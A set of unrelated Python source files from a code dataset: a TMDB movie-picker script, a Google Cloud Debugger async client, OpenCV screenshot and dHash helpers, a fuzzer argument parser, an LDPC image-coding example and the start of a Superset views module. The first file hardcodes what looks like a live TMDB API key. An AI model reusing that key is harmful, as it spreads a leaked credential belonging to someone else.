api_key = "04b2253f2a386ad7e8fcc3104c69531e"
# Genres Function
def get_genres():
query = f"https://api.themoviedb.org/3/genre/movie/list?api_key={api_key}&language=en-US"
response = requests.get(query)
if response.status_code == 200:
array = response.json()
genres = {}
for i in array['genres']:
genres[i['id']] = i['name']
return genres
else:
return ("error")
# Introduction Function
def greeting():
print("Hi there! Struggling to find a movie to watch? Let us help!")
print(".")
print(".")
print(".")
print(".")
print("Simply type y or n in response to each of the questions, and your partner will do the same.")
print(".")
print(".")
print(".")
print(".")
# User Input
def get_input(choices, stage):
'''
Takes input from two users and returns the intersection. Second argument is 1/2 for genres or movies.
'''
# User Input
user1 = []
print("\nFirst User\n")
for choice in choices:
if stage == 1:
user_input = input(f"Do you want to watch a {choice} movie? " )
elif stage == 2:
user_input = input(f"Do you want to watch {choice}? " )
if user_input == "y":
user1.append(choice)
# User 2 Input
user2 = []
print("\nSecond User\n")
for choice in choices:
if stage == 1:
user_input = input(f"Do you want to watch a {choice} movie? " )
elif stage == 2:
user_input = input(f"Do you want to watch {choice}? " )
if user_input == "y":
user2.append(choice)
return list(set(user1).intersection(user2))
# Matching Genres
def responseMessage(genres):
'''
Depending on the matched genres, returns a string.
'''
print("\n")
if len(genres) == 1:
return "You should watch " + genres[0] + "!\n"
elif len(genres) == 2:
return "You should watch " + genres[0] + " or " + genres[1] + "!\n"
elif len(genres) >= 3:
message = "You should watch "
for i in range(len(genres) - 1):
message = message + genres[i] + ", "
message = message + " or " + str(genres[-1]) + ".\n"
return message
else:
return "Maybe you should go for a walk?\n"
# Find Trending Movies based on their genres
def findMovies(genres):
query2 = f"https://api.themoviedb.org/3/trending/movie/day?api_key={api_key}"
response = requests.get(query2)
response.json()
movie_choices = {}
for title in response.json()['results']:
movie_genres = []
for genre in title['genre_ids']:
movie_genres.append(genres[genre])
movie_choices[title['original_title']] = movie_genres
return movie_choices
def likedMovies(genres, movie_choices):
movies_list = []
for key, value in movie_choices.items():
if set(genres).intersection(value):
movies_list.append(key)
return movies_list
def outputMessage(movies_list):
'''
Takes a final list of movies and prints the output.
'''
message = "\nYou should watch:\n"
for movie in movies_list:
message += "- " + movie
return message
|
the-stack_106_22039
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.debugger_v2.types import data
from google.cloud.debugger_v2.types import debugger
from .transports.base import Debugger2Transport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import Debugger2GrpcAsyncIOTransport
from .client import Debugger2Client
class Debugger2AsyncClient:
"""The Debugger service provides the API that allows users to
collect run-time information from a running application, without
stopping or slowing it down and without modifying its state. An
application may include one or more replicated processes
performing the same work.
A debugged application is represented using the Debuggee
concept. The Debugger service provides a way to query for
available debuggees, but does not provide a way to create one.
A debuggee is created using the Controller service, usually by
running a debugger agent with the application.
The Debugger service enables the client to set one or more
Breakpoints on a Debuggee and collect the results of the set
Breakpoints.
"""
_client: Debugger2Client
DEFAULT_ENDPOINT = Debugger2Client.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = Debugger2Client.DEFAULT_MTLS_ENDPOINT
common_billing_account_path = staticmethod(Debugger2Client.common_billing_account_path)
parse_common_billing_account_path = staticmethod(Debugger2Client.parse_common_billing_account_path)
common_folder_path = staticmethod(Debugger2Client.common_folder_path)
parse_common_folder_path = staticmethod(Debugger2Client.parse_common_folder_path)
common_organization_path = staticmethod(Debugger2Client.common_organization_path)
parse_common_organization_path = staticmethod(Debugger2Client.parse_common_organization_path)
common_project_path = staticmethod(Debugger2Client.common_project_path)
parse_common_project_path = staticmethod(Debugger2Client.parse_common_project_path)
common_location_path = staticmethod(Debugger2Client.common_location_path)
parse_common_location_path = staticmethod(Debugger2Client.parse_common_location_path)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
Debugger2AsyncClient: The constructed client.
"""
return Debugger2Client.from_service_account_info.__func__(Debugger2AsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
Debugger2AsyncClient: The constructed client.
"""
return Debugger2Client.from_service_account_file.__func__(Debugger2AsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@property
def transport(self) -> Debugger2Transport:
"""Returns the transport used by the client instance.
Returns:
Debugger2Transport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(type(Debugger2Client).get_transport_class, type(Debugger2Client))
def __init__(self, *,
credentials: ga_credentials.Credentials = None,
transport: Union[str, Debugger2Transport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the debugger2 client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.Debugger2Transport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = Debugger2Client(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def set_breakpoint(self,
request: debugger.SetBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_: data.Breakpoint = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.SetBreakpointResponse:
r"""Sets the breakpoint to the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.SetBreakpointRequest`):
The request object. Request to set a breakpoint
debuggee_id (:class:`str`):
Required. ID of the debuggee where
the breakpoint is to be set.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_ (:class:`google.cloud.debugger_v2.types.Breakpoint`):
Required. Breakpoint specification to set. The field
``location`` of the breakpoint must be set.
This corresponds to the ``breakpoint_`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.SetBreakpointResponse:
Response for setting a breakpoint.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.SetBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_ is not None:
request.breakpoint_ = breakpoint_
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.set_breakpoint,
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_breakpoint(self,
request: debugger.GetBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.GetBreakpointResponse:
r"""Gets breakpoint information.
Args:
request (:class:`google.cloud.debugger_v2.types.GetBreakpointRequest`):
The request object. Request to get breakpoint
information.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoint to get.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_id (:class:`str`):
Required. ID of the breakpoint to
get.
This corresponds to the ``breakpoint_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.GetBreakpointResponse:
Response for getting breakpoint
information.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.GetBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_id is not None:
request.breakpoint_id = breakpoint_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_breakpoint,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_breakpoint(self,
request: debugger.DeleteBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the breakpoint from the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.DeleteBreakpointRequest`):
The request object. Request to delete a breakpoint.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoint to delete.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_id (:class:`str`):
Required. ID of the breakpoint to
delete.
This corresponds to the ``breakpoint_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.DeleteBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_id is not None:
request.breakpoint_id = breakpoint_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_breakpoint,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def list_breakpoints(self,
request: debugger.ListBreakpointsRequest = None,
*,
debuggee_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.ListBreakpointsResponse:
r"""Lists all breakpoints for the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.ListBreakpointsRequest`):
The request object. Request to list breakpoints.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoints to list.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.ListBreakpointsResponse:
Response for listing breakpoints.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.ListBreakpointsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_breakpoints,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_debuggees(self,
request: debugger.ListDebuggeesRequest = None,
*,
project: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.ListDebuggeesResponse:
r"""Lists all the debuggees that the user has access to.
Args:
request (:class:`google.cloud.debugger_v2.types.ListDebuggeesRequest`):
The request object. Request to list debuggees.
project (:class:`str`):
Required. Project number of a Google
Cloud project whose debuggees to list.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.ListDebuggeesResponse:
Response for listing debuggees.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.ListDebuggeesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_debuggees,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-debugger-client",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"Debugger2AsyncClient",
)
|
the-stack_106_22040
|
# This file is created by Minyi Liu (GitHub ID: MiniMinyi)
# The hash algorithm is copied from:
# https://github.com/hjaurum/DHash/blob/master/dHash.py
def _intersect(rect1, rect2):
"""
Check whether two rectangles intersect.
:param rect1, rect2: a rectangle represented with a turple(x,y,w,h,approxPoly_corner_count)
:return whether the two rectangles intersect
"""
# check x
x_intersect = False
if rect1[0] <= rect2[0] and rect2[0] - rect1[0] < rect1[2]:
x_intersect = True
if rect2[0] <= rect1[0] and rect1[0] - rect2[0] < rect2[2]:
x_intersect = True
# check y
y_intersect = False
if rect1[1] <= rect2[1] and rect2[1] - rect1[1] < rect1[3]:
y_intersect = True
if rect2[1] <= rect1[1] and rect1[1] - rect2[1] < rect2[3]:
y_intersect = True
return x_intersect and y_intersect
def load_image_from_path(img_path):
"""
Load an image from path
:param img_path: The path to the image
:return:
"""
import cv2
return cv2.imread(img_path)
def load_image_from_buf(img_bytes):
"""
Load an image from a byte array
:param img_bytes: The byte array of an image
:return:
"""
import cv2
import numpy
img_bytes = numpy.array(img_bytes)
return cv2.imdecode(img_bytes, cv2.IMREAD_UNCHANGED)
def find_views(img):
"""
Find rectangular views given a UI screenshot
:param img: numpy.ndarray, representing an image in opencv
:return: a list of rectangles, each of which is a tuple (x,y,w,h) representing an identified UI view.
"""
import cv2
x_scale = 0.3
y_scale = 0.3
# resize to a smaller image
img = cv2.resize(img, (0, 0), fx=x_scale, fy=y_scale)
# get width and height
width = len(img)
height = len(img[0])
area = width * height
# Split out each channel
blue, green, red = cv2.split(img)
# Run canny edge detection on each channel
blue_edges = cv2.Canny(blue, 200, 250)
green_edges = cv2.Canny(green, 200, 250)
red_edges = cv2.Canny(red, 200, 250)
# Join edges back into image
edges = blue_edges | green_edges | red_edges
# find contour
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
rectangle_list = []
for index, cnt in enumerate(contours):
contour_area = cv2.contourArea(cnt)
# area constraint
if contour_area < area / 300 or contour_area > area / 4:
continue
x, y, w, h = cv2.boundingRect(cnt)
# find approxPolyDP
epsilon = 0.01 * cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, epsilon, True)
if len(approx) == 2:
continue
new_rectangle = (x, y, w, h, len(approx))
should_append = True
remove_list = []
for index, rectangle in enumerate(rectangle_list):
if _intersect(new_rectangle, rectangle):
if new_rectangle[4] > rectangle[4]:
should_append = False
break
else:
remove_list.append(index)
remove_list.reverse()
for index in remove_list:
del rectangle_list[index]
if should_append:
rectangle_list.append(new_rectangle)
result_rectangles = [
(int(float(x)/x_scale), int(float(y)/y_scale), int(float(w)/x_scale), int(float(h)/y_scale))
for x, y, w, h, len_approx in rectangle_list]
# For debugging, show the image
# print result_rectangles
# for x, y, w, h, len_approx in rectangle_list:
# cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5)
# cv2.imshow('image', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
return result_rectangles
def calculate_dhash(img):
"""
Calculate the dhash value of an image.
:param img: numpy.ndarray, representing an image in opencv
:return:
"""
difference = _calculate_pixel_difference(img)
# convert to hex
decimal_value = 0
hash_string = ""
for index, value in enumerate(difference):
if value:
decimal_value += value * (2 ** (index % 8))
if index % 8 == 7: # every eight binary bit to one hex number
hash_string += str(hex(decimal_value)[2:-1].rjust(2, "0")) # 0xf=>0x0f
decimal_value = 0
return hash_string
def _calculate_pixel_difference(img):
"""
Calculate difference between pixels
:param img: numpy.ndarray, representing an image in opencv
"""
import cv2
resize_width = 18
resize_height = 16
# 1. resize to 18*16
smaller_image = cv2.resize(img, (resize_width, resize_height))
# 2. calculate grayscale
grayscale_image = cv2.cvtColor(smaller_image, cv2.COLOR_BGR2GRAY)
# 3. calculate difference between pixels
difference = []
for row in range(resize_height):
for col in range(resize_width - 1):
difference.append(grayscale_image[row][col] > grayscale_image[row][col + 1])
return difference
def img_hamming_distance(img1, img2):
"""
Calculate the hamming distance between two images
:param img1: numpy.ndarray, representing an image in opencv
:param img2: numpy.ndarray, representing an image in opencv
:return: int, the hamming distance between two images
"""
# A. use dHash value to calculate hamming distance
if isinstance(img1, str) and isinstance(img2, str):
return dhash_hamming_distance(img1, img2)
# B. use numpy.ndarray to calculate hamming distance
_hamming_distance = 0
image1_difference = _calculate_pixel_difference(img1)
image2_difference = _calculate_pixel_difference(img2)
for index, img1_pix in enumerate(image1_difference):
img2_pix = image2_difference[index]
if img1_pix != img2_pix:
_hamming_distance += 1
return _hamming_distance
def dhash_hamming_distance(dhash1, dhash2):
"""
Calculate the hamming distance between two dhash values
:param dhash1: str, the dhash of an image returned by `calculate_dhash`
:param dhash2: str, the dhash of an image returned by `calculate_dhash`
:return: int, the hamming distance between two dhash values
"""
difference = (int(dhash1, 16)) ^ (int(dhash2, 16))
return bin(difference).count("1")
|
the-stack_106_22041
|
from time import sleep
class Iteratable:
def __init__(self, max):
self.max = max
self.arr = []
self.i = 0
def __iter__(self):
self.n = 0
if len(self.arr) == self.max and self.i + 1 <= self.max :
return iter(self.arr)
return self
def __next__(self):
if self.n < self.max and len(self.arr) < self.max :
sleep(1)
self.n += 1
self.arr.append(self.n)
return self.n
else:
raise StopIteration
p = Iteratable(5)
for i in p:
print(i)
for i in p:
print(i)
|
the-stack_106_22043
|
#!/usr/bin/env python
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
from host import Host
class Args:
@classmethod
def make_parser(cls, description, name_required=True, label_present=False):
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
'-d',
'--device',
help='Name of device, only needed when multiple devices are present.')
parser.add_argument(
'-f',
'--foreground',
action='store_true',
help='If true, display fuzzer output.')
parser.add_argument(
'-n',
'--no-cipd',
action='store_true',
help='Skip steps which involve transferring packages to or from CIPD')
parser.add_argument(
'-o', '--output', help='Path under which to store results.')
parser.add_argument(
'-s',
'--staging',
help='Host directory to use for un/packing corpus bundles.' +
' Defaults to a temporary directory.')
name_help = ('Fuzzer name to match. This can be part of the package and/or'
+ ' target name, e.g. "foo", "bar", and "foo/bar" all match' +
' "foo_package/bar_target".')
if name_required:
parser.add_argument('name', help=name_help)
else:
parser.add_argument('name', nargs='?', help=name_help)
if label_present:
parser.add_argument(
'label',
nargs='?',
default='latest',
help='If a directory, installs a corpus from that location. ' +
'Otherwise installs the labeled version from CIPD. In this case, ' +
'"label" may be either a "ref" or a key:value "tag" as described ' +
'in `cipd help`. By default, corpora are uploaded with the ' +
'"latest" ref and a tag of "integration:<git-revision>" ' +
'corresponding to current revision of the //integration repository.')
return parser
|
the-stack_106_22045
|
import numpy as np
from pyldpc import make_ldpc, ldpc_images
from pyldpc.utils_img import gray2bin # , rgb2bin
from matplotlib import pyplot as plt
from PIL import Image
from time import time
##################################################################
# Let's see the image we are going to be working with
tree = Image.open("data/tree.png")
# convert it to grayscale and keep one channel
tree = np.asarray(tree.convert('LA'))[:, :, 0]
# Convert it to a binary matrix
tree_bin = gray2bin(tree)
print("tree shape: (%s, %s)" % tree.shape)
print("Binary tree shape: (%s, %s, %s)" % tree_bin.shape)
n = 200
d_v = 3
d_c = 4
seed = 42
##################################################################
# First we create a small LDPC code i.e a pair of decoding and coding matrices
# H and G. H is a regular parity-check matrix with d_v ones per row
# and d_c ones per column
H, G = make_ldpc(n, d_v, d_c, seed=seed, systematic=True, sparse=True)
##################################################################
# Now we simulate the transmission with Gaussian white noise
# and recover the original image via belief-propagation.
snr = 8
tree_coded, tree_noisy = ldpc_images.encode_img(G, tree_bin, snr, seed=seed)
print("Coded tree shape", tree_coded.shape)
t = time()
tree_decoded = ldpc_images.decode_img(G, H, tree_coded, snr, tree_bin.shape)
t = time() - t
print("tree | Decoding time: ", t)
error_decoded_tree = abs(tree - tree_decoded).mean()
error_noisy_tree = abs(tree_noisy - tree).mean()
plt.imshow(tree, 'gray')
plt.show()
plt.imshow(tree_noisy, 'gray')
plt.show()
plt.imshow(tree_decoded, 'gray')
plt.show()
|
the-stack_106_22046
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines, invalid-name
from __future__ import annotations
import logging
import re
from contextlib import closing
from datetime import datetime, timedelta
from typing import Any, Callable, cast, Dict, List, Optional, Union
from urllib import parse
import backoff
import humanize
import pandas as pd
import simplejson as json
from flask import abort, flash, g, redirect, render_template, request, Response
from flask_appbuilder import expose
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_appbuilder.security.decorators import (
has_access,
has_access_api,
permission_name,
)
from flask_appbuilder.security.sqla import models as ab_models
from flask_babel import gettext as __, lazy_gettext as _
from sqlalchemy import and_, or_
from sqlalchemy.exc import DBAPIError, NoSuchModuleError, SQLAlchemyError
from sqlalchemy.orm.session import Session
from sqlalchemy.sql import functions as func
from superset import (
app,
appbuilder,
conf,
db,
event_logger,
is_feature_enabled,
results_backend,
results_backend_use_msgpack,
security_manager,
sql_lab,
viz,
)
from superset.charts.commands.exceptions import ChartNotFoundError
from superset.charts.dao import ChartDAO
from superset.common.chart_data import ChartDataResultFormat, ChartDataResultType
from superset.common.db_query_status import QueryStatus
from superset.connectors.base.models import BaseDatasource
from superset.connectors.sqla.models import (
AnnotationDatasource,
SqlaTable,
SqlMetric,
TableColumn,
)
from superset.dashboards.commands.importers.v0 import ImportDashboardsCommand
from superset.dashboards.dao import DashboardDAO
from superset.dashboards.permalink.commands.get import GetDashboardPermalinkCommand
from superset.dashboards.permalink.exceptions import DashboardPermalinkGetFailedError
from superset.databases.commands.exceptions import DatabaseInvalidError
from superset.databases.dao import DatabaseDAO
from superset.databases.filters import DatabaseFilter
from superset.databases.utils import make_url_safe
from superset.datasets.commands.exceptions import DatasetNotFoundError
from superset.datasource.dao import DatasourceDAO
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.exceptions import (
CacheLoadError,
CertificateException,
DatabaseNotFound,
SerializationError,
SupersetCancelQueryException,
SupersetErrorException,
SupersetException,
SupersetGenericErrorException,
SupersetSecurityException,
SupersetTimeoutException,
)
from superset.explore.form_data.commands.get import GetFormDataCommand
from superset.explore.form_data.commands.parameters import CommandParameters
from superset.explore.permalink.commands.get import GetExplorePermalinkCommand
from superset.explore.permalink.exceptions import ExplorePermalinkGetFailedError
from superset.extensions import async_query_manager, cache_manager
from superset.jinja_context import get_template_processor
from superset.models.core import Database, FavStar, Log
from superset.models.dashboard import Dashboard
from superset.models.datasource_access_request import DatasourceAccessRequest
from superset.models.slice import Slice
from superset.models.sql_lab import Query, TabState
from superset.models.user_attributes import UserAttribute
from superset.queries.dao import QueryDAO
from superset.security.analytics_db_safety import check_sqlalchemy_uri
from superset.sql_lab import get_sql_results
from superset.sql_parse import ParsedQuery
from superset.sql_validators import get_validator_by_name
from superset.sqllab.command import CommandResult, ExecuteSqlCommand
from superset.sqllab.command_status import SqlJsonExecutionStatus
from superset.sqllab.exceptions import (
QueryIsForbiddenToAccessException,
SqlLabException,
)
from superset.sqllab.execution_context_convertor import ExecutionContextConvertor
from superset.sqllab.limiting_factor import LimitingFactor
from superset.sqllab.query_render import SqlQueryRenderImpl
from superset.sqllab.sql_json_executer import (
ASynchronousSqlJsonExecutor,
SqlJsonExecutor,
SynchronousSqlJsonExecutor,
)
